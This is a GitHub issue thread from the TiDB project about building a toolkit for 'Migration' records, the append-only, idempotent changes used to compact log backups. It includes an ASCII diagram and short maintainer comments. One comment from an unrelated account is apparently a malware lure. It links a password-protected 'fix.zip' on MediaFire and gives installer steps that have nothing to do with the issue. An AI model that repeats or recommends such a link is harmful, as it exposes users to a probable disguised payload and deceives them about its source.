### ISSUE TITLE
Implement the toolkit for managing `Migration`s.

### ISSUE THREAD

**Issue by YuJuncen** [pingcap/tidb#55661]
## Enhancement
We have designed the migration system for compacting log backup. Generally, every modifications over the "stabilized" storage must be done by appending a "migration".

```                                                     
     +-Modifications over those files                 
     | Must be done by Appending a migration.         
     |                                                
+----|--------------+-------------+                   
| stabilized        | Appending   |                   
|-------------------|-------------+                   
|                    \                                
 \                   |                                
 |Truncated TS        \Resolved TS                    
```

Migrations are idempotent batch modifications (adding a compaction, delete a file, etc..) to the backup files.
You may check the protocol buffer message `Migration` for more details.
Idempontence is important for migrations, as they may be executed multi times due to retry or racing.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YuJuncen** [comment]
We need to implement the toolkit for the `Migration` storage.
